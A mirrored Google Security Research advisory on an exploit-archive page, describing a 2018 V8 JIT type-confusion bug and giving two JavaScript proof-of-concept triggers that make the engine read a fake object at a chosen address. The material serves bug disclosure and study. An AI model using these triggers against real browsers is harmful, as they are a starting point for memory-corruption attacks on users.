首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Google Chrome V8 JIT - 'LoadElimination::ReduceTransitionElementsKind' Type Conf
来源:Google Security Research 作者:Google 发布时间:2018-04-11  
/*
I think this commit has introduced the bug: https://chromium.googlesource.com/v8/v8.git/+/9884bc5dee488bf206655f07b8a487afef4ded9b
 
Reduction LoadElimination::ReduceTransitionElementsKind(Node* node) {
...
     if (object_maps.contains(ZoneHandleSet<Map>(source_map))) {
       object_maps.remove(source_map, zone());
       object_maps.insert(target_map, zone());
-      AliasStateInfo alias_info(state, object, source_map);
-      state = state->KillMaps(alias_info, zone());
-      state = state->AddMaps(object, object_maps, zone());
+      state = state->SetMaps(object, object_maps, zone());
     }
...
}
 
I think the "state->KillMaps(alias_info, zone());" was accidentally removed. This lack may lead CheckMap instructions to be removed incorrectly.
 
A PoC demonstrating type confusion:
*/
 
function opt(a, b) {
    b[0] = 0;
 
    a.length;
 
    // TransitionElementsKind
    for (let i = 0; i < 1; i++)
        a[0] = 0;
 
    // CheckMap removed, type confusion
    b[0] = 9.431092e-317;  // 0x1234567
}
 
let arr1 = new Array(1);
arr1[0] = 'a';
opt(arr1, [0]);
 
let arr2 = [0.1];
opt(arr2, arr2);
 
%OptimizeFunctionOnNextCall(opt);
 
opt(arr2, arr2);
arr2[0].x  // access 0x1234566
 
Without natives syntax:
function opt(a, b) {
    b[0] = 0;
 
    a.length;
 
    // TransitionElementsKind
    for (let i = 0; i < 1; i++)
        a[0] = 0;
 
    b[0] = 9.431092e-317;  // 0x1234567
 
    // Force optimization
    for (let i = 0; i < 10000000; i++) {
 
    }
}
 
let arr1 = new Array(1);
arr1[0] = 'a';
opt(arr1, [0]);
 
let arr2 = [0.1];
opt(arr2, arr2);
 
opt(arr2, arr2);
arr2[0].x  // access 0x1234566
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DVD X Player Standard 5.5.3.9
·SysGauge Pro 4.6.12 Local Buff
·CyberArk Password Vault Web Ac
·F5 BIG-IP 11.6 SSL Virtual Ser
·CyberArk Password Vault < 9.7
·Drupal < 7.58 / < 8.3.9 / < 8.
·GoldWave 5.70 - Local Buffer O
·Drupal < 7.58 / < 8.3.9 / < 8.
·H2 Database - 'Alias' Arbitrar
·MikroTik 6.41.4 - FTP daemon D
·SSH / SSL RSA Private Key Pass
·GNU Beep 1.3 - 'HoleyBeep' Loc
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved